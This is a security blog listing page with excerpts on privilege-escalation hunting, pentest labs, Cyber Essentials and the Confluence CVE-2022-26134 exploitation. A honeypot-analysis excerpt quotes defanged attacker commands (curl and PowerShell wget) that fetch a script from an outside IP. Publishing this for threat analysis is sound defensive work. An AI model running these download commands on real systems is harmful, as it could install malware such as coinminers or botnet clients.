Hacking – Page 10

Priviledge Escalation Hunting – Scheduled Tasks and Scripts

TLDR: If you have been hunting for privescs before you will know it’s normally not a fast task, you will have a shed ton of data to look at. Sure WINPEAS is good but it’s not a silver bullet.

Here is a really small script which focuses on system administration files/scripts, scheduled tasks and scheduled task history to help you hunt for weaknesses:

Education

PWNDEFND: Known Exploitable Vulnerabilities (KEV) – AKA: Offensive KEV

There’s thousand of vulnerabilities, but do you ever struggle work out what ones might actually be useful to you if you are defending or attacking?

Well don’t worry I’ve started to document some things that might help you both attack and defend in CYBERSPACE!

Guides

SSH oh MY: no matching key exchange method found.…

Have you ever tried to SSH into a server and recieved the following error?

no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

Well that’s probably becuase you are using a bit of kit with legacy software or firmware.

Then when you try to SSH and you add diffie-hellman-group1-sh1 you get the following back?

Education

Creating a tracker and dashboard for Cyber Essentials

I was talking to a friend about a requirement to “measure” cyber essentials compliance. Now if you know a thing or two about standards and applying standards to complex technology environments you might come up with:

Can’t we just script a checker?
Don’t we have all the audit data in the *checks notes* 1000 inventory systems we have?

Well sure, you could write a massive set of rules which ignore any context and try and cater for a huge number of different scenarios. You could use the Q&A approach as well (which is how the standard workbook works anyway so that already exists). But let’s say you are an IT manager, and you want to KNOW how your environment stacks up!

The question is simple, it’s easy to ask, look:

“How compliant are we against Cyber Essentials?”

Education

Deploy a mini Pentester Lab with Docker

I build VM labs. Lots of them, but I tend to go full machines. I was checking out the new TCM web app course the other day (honestly i’ll write a review if I get time to finish it!) and it’s built around using docker for DVWA and OWASP JUICE SHOP so I figured I should write a quick blog about how to deploy these so people can get started learning in minutes.

Now here we have:

DVWA
JUICESHOP
METASPLOITABLE

but you don’t have to stop there, i’m sure there’s others you can use as well!

This isn’t an exhaustive guide, but it will get the docker instances up and running.

Education

Installing Nessus Pro on Kali Linux

You can deploy Nessus in a range of ways, from direct install through to using a cloud-based deployment or virtual appliance.

A common reason for deploying on Kali or other distro rather than using the virtual appliance is for mobility, ease of use but also you might want to VPN or proxy traffic.

The install process is simple, log into your account on tenable community portal and download the relevant installation package.

Education

CVE-2022-26134 – Honeypot Payload Analysis Example

Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:

HTTP Command Executes this:

curl http[:]//202.28.229.174/ap[.]sh?confcurl

This download the following (ap.sh)

$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing

$stealz.Content | Out-File ap.txt

Education

Passive Port Scanners & Internet Asset Discovery Platforms

Useful for a range of defensive and offensive purposes, internet asset search platforms enable a range of activities from:

Research & Trend Analysis
Vulnerability Hunting
Attack Surface Mapping
OSINT

Each has its own interfaces, features, dataset sand styles.

I’ve put together a list of the most popular, there may be more that I haven’t listed.

Threat Intel

CVE-2022-26134 – Confluence Zero Day RCE

We are seeing active exploitation in the wild: MIRAI deployment, coinminer deployments etc.

THIS DOES SHOW IN THE ACCESS LOGS! The comment about “what isn’t in the logs” is about POST request BODY not showing in them, not that nothing is logged

https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d/community

XMRIG, KINSING, MIRAI etc. are being deployed by threat actors after exploiting this vulnerability.

This is a fast publish

POC is in the wild: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/

https://github.com/jbaines-r7/through_the_wire

keep checking vendor guidance and keep checking this for updates… use at own risk etc.

Workaround/Hotfixes have been published by Atlassian:

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

https://jira.atlassian.com/browse/CONFSERVER-79000

GreyNoise Tag is online: GreyNoise Trends

Also check this out for scanners: GreyNoise

Nice work https://twitter.com/_mattata and all the other people in the cyber community that are working on this!

IT MAY BE WISE TO ASSUME BREACH

The vulnerability appears to be in: xwork-1.0.3-atlassian-10.jar

Background

Velocity discovers a zero-day in confluence 03/06/2022 (GMT)

.@Volexity discovers zero-day exploit impacting all current versions of Atlassian Confluence Server and Data Center. Attackers deploy in-memory Java implant to evade detection. Read more in our latest blog post: https://t.co/aCSwnSUfj8 #DFIR #ThreatIntel #InfoSec
— Volexity (@Volexity) June 2, 2022

Guides

Cyber Essentials Readiness

So, you have a driver to achieve cyber essentials, great stuff. Now if you are a business of reasonable size and scale this activity requires a bit of planning, context and lots of access and data. This could be via a distributed team or via a dedicated project team. In this post I’m going to look at what you may need to conduct the planning, discovery, assessment, and certification for Cyber Essentials and/or CE+.